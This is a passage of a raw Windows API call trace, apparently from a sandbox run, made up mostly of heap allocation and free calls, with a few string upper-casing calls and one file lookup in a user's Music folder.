(HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0208.032] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72628 [0208.033] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0208.033] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0208.033] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72628 [0208.033] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa720 [0208.033] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72708 [0208.033] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0208.033] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa600 [0208.033] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77df0 [0208.033] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa540 [0208.033] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72648 [0208.033] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa540 | out: hHeap=0x2af0000) returned 1 [0208.033] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e40 [0208.033] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0208.033] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7e0 [0208.033] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d28 [0208.033] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa828 [0208.033] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72708 [0208.033] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa828 | out: hHeap=0x2af0000) returned 1 [0208.033] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cb0 [0208.033] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa828 [0208.033] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa540 [0208.033] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e68 [0208.033] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa558 [0208.033] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72718 [0208.033] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa558 | out: hHeap=0x2af0000) returned 1 [0208.033] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77af8 [0208.033] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa558 [0208.034] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa990 [0208.034] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e18 [0208.034] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa978 [0208.034] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a728f8 [0208.034] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa978 | out: hHeap=0x2af0000) returned 1 [0208.034] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ee0 [0208.034] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa20 [0208.034] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de40 [0208.034] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0208.034] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72aa8 [0208.034] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b08 [0208.034] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9a8 [0208.034] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9c0 [0208.034] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a08 [0208.034] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaae0 [0208.034] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0208.034] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b58 [0208.034] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c38 [0208.034] CharUpperBuffW (in: lpsz="SSA2100602512", cchLength=0xd | out: lpsz="SSA2100602512") returned 0xd [0208.034] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c38 | out: hHeap=0x2af0000) returned 1 [0208.034] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b58 | out: hHeap=0x2af0000) returned 1 [0208.034] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaae0 | out: hHeap=0x2af0000) returned 1 [0208.034] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9c0 | out: hHeap=0x2af0000) returned 1 [0208.034] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9a8 | out: hHeap=0x2af0000) returned 1 [0208.034] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0208.034] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72aa8 | out: hHeap=0x2af0000) returned 1 [0208.034] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e840 [0208.034] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0208.035] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e840 | out: hHeap=0x2af0000) returned 1 [0208.035] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0208.035] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa888 [0208.035] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b08 [0208.035] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa888 | out: hHeap=0x2af0000) returned 1 [0208.035] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77dc8 [0208.035] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9f0 [0208.035] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8a0 [0208.035] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72a08 [0208.035] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e90 [0208.035] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9c0 [0208.035] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72aa8 [0208.035] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9c0 | out: hHeap=0x2af0000) returned 1 [0208.035] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b98 [0208.035] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa960 [0208.035] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa978 [0208.035] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9f0 | out: hHeap=0x2af0000) returned 1 [0208.035] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa900 [0208.035] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8b8 [0208.035] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72a38 [0208.035] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b48 [0208.035] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaaf8 [0208.035] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72a58 [0208.035] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaaf8 | out: hHeap=0x2af0000) returned 1 [0208.035] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77bc0 [0208.035] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa870 [0208.035] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa38 [0208.035] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77dc8 | out: hHeap=0x2af0000) returned 1 [0208.035] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0208.035] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa900 | out: hHeap=0x2af0000) returned 1 [0208.036] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0208.036] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa08 [0208.036] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b58 [0208.036] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa08 | out: hHeap=0x2af0000) returned 1 [0208.036] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b20 [0208.036] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaab0 [0208.036] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9f0 [0208.036] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b08 [0208.036] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cd8 [0208.036] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9d8 [0208.036] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b18 [0208.036] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9d8 | out: hHeap=0x2af0000) returned 1 [0208.036] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77be8 [0208.036] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa50 [0208.036] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa918 [0208.036] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b28 [0208.036] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaab0 | out: hHeap=0x2af0000) returned 1 [0208.036] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9a8 [0208.036] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9c0 [0208.036] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73068 [0208.036] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa08 [0208.036] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73068 | out: hHeap=0x2af0000) returned 1 [0208.036] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa08 | out: hHeap=0x2af0000) returned 1 [0208.036] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9c0 | out: hHeap=0x2af0000) returned 1 [0208.036] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9a8 | out: hHeap=0x2af0000) returned 1 [0208.036] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b28 | out: hHeap=0x2af0000) returned 1 [0208.036] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9f0 | out: hHeap=0x2af0000) returned 1 [0208.036] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0208.036] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa918 | out: hHeap=0x2af0000) returned 1 [0208.037] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa68 [0208.037] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa08 [0208.037] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b08 [0208.037] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c10 [0208.037] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa888 [0208.037] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b28 [0208.037] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa888 | out: hHeap=0x2af0000) returned 1 [0208.037] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77eb8 [0208.037] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa900 [0208.037] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9a8 [0208.037] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73118 [0208.037] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa68 | out: hHeap=0x2af0000) returned 1 [0208.037] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73118 | out: hHeap=0x2af0000) returned 1 [0208.037] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa08 | out: hHeap=0x2af0000) returned 1 [0208.037] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0208.037] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9a8 | out: hHeap=0x2af0000) returned 1 [0208.037] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b20 | out: hHeap=0x2af0000) returned 1 [0208.037] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b58 | out: hHeap=0x2af0000) returned 1 [0208.037] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0208.037] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9a8 [0208.037] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b08 [0208.037] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9a8 | out: hHeap=0x2af0000) returned 1 [0208.037] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d00 [0208.037] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaab28 [0208.037] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8d0 [0208.037] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b58 [0208.037] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b20 [0208.037] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa98 [0208.037] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a73068 [0208.038] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa98 | out: hHeap=0x2af0000) returned 1 [0208.038] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d50 [0208.038] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa08 [0208.038] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa888 [0208.038] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d00 | out: hHeap=0x2af0000) returned 1 [0208.038] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0208.038] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab28 | out: hHeap=0x2af0000) returned 1 [0208.038] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0208.038] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9c0 [0208.038] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b08 [0208.038] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9c0 | out: hHeap=0x2af0000) returned 1 [0208.038] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f08 [0208.038] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8e8 [0208.038] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa68 [0208.038] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a73118 [0208.038] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c88 [0208.038] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa840 [0208.038] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a73128 [0208.038] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa840 | out: hHeap=0x2af0000) returned 1 [0208.038] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d00 [0208.038] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa918 [0208.038] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9a8 [0208.038] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a730a8 [0208.038] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8e8 | out: hHeap=0x2af0000) returned 1 [0208.038] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9c0 [0208.038] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9f0 [0208.038] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a730c8 [0208.039] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9d8 [0208.039] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730c8 | out: hHeap=0x2af0000) returned 1 [0208.039] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\pGVUGdUF Vft.mp3", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x725cd5e0, ftCreationTime.dwHighDateTime=0x1d5d61d, ftLastAccessTime.dwLowDateTime=0x7a6e0b10, ftLastAccessTime.dwHighDateTime=0x1d5d644, ftLastWriteTime.dwLowDateTime=0x7a6e0b10, ftLastWriteTime.dwHighDateTime=0x1d5d644, nFileSizeHigh=0x0, nFileSizeLow=0x150f9, dwReserved0=0x0, dwReserved1=0x0, cFileName="pGVUGdUF Vft.mp3", cAlternateFileName="PGVUGD~1.MP3")) returned 0x9e1d38 [0208.039] FindClose (in: hFindFile=0x9e1d38 | out: hFindFile=0x9e1d38) returned 1 [0208.039] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9d8 | out: hHeap=0x2af0000) returned 1 [0208.039] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9f0 | out: hHeap=0x2af0000) returned 1 [0208.039] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9c0 | out: hHeap=0x2af0000) returned 1 [0208.039] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730a8 | out: hHeap=0x2af0000) returned 1 [0208.039] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa68 | out: hHeap=0x2af0000) returned 1 [0208.039] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73118 | out: hHeap=0x2af0000) returned 1 [0208.039] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9a8 | out: hHeap=0x2af0000) returned 1 [0208.039] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f08 | out: hHeap=0x2af0000) returned 1 [0208.039] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0208.039] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0208.039] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa68 [0208.039] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b08 [0208.039] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa68 | out: hHeap=0x2af0000) returned 1 [0208.039] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f08 [0208.039] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaab0 [0208.039] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa840 [0208.039] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a730a8 [0208.039] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f30 [0208.040] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa68 [0208.040] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a730c8 [0208.040] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa68 | out: hHeap=0x2af0000) returned 1 [0208.040] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f58 [0208.040] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa68 [0208.040] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9a8 [0208.040] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73118 [0208.040] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaab0 | out: hHeap=0x2af0000) returned 1 [0208.040] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa80 [0208.040] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9d8 [0208.040] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a716e8 [0208.042] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a716e8 | out: hHeap=0x2af0000) returned 1 [0208.042] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa98 | out: hHeap=0x2af0000) returned 1 [0208.042] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9d8 | out: hHeap=0x2af0000) returned 1 [0208.042] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa80 | out: hHeap=0x2af0000) returned 1 [0208.042] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73118 | out: hHeap=0x2af0000) returned 1 [0208.042] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa840 | out: hHeap=0x2af0000) returned 1 [0208.042] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730a8 | out: hHeap=0x2af0000) returned 1 [0208.042] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9a8 | out: hHeap=0x2af0000) returned 1 [0208.042] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f08 | out: hHeap=0x2af0000) returned 1 [0208.042] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0208.042] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0208.042] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77da0 | out: hHeap=0x2af0000) returned 1 [0208.042] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0208.042] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73118 | out: hHeap=0x2af0000) returned 1 [0208.042] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0208.042] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d78 | out: hHeap=0x2af0000) returned 1 [0208.042] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73118 | out: hHeap=0x2af0000) returned 1 [0208.042] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa930 | out: hHeap=0x2af0000) returned 1 [0208.042] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa80 | out: hHeap=0x2af0000) returned 1 [0208.042] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8e8 | out: hHeap=0x2af0000) returned 1 [0208.042] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730a8 | out: hHeap=0x2af0000) returned 1 [0208.042] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0208.042] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ea40 | out: hHeap=0x2af0000) returned 1 [0208.042] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0208.043] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77aa8 | out: hHeap=0x2af0000) returned 1 [0208.043] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730a8 | out: hHeap=0x2af0000) returned 1 [0208.043] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71688 | out: hHeap=0x2af0000) returned 1 [0208.043] CharUpperBuffW (in: 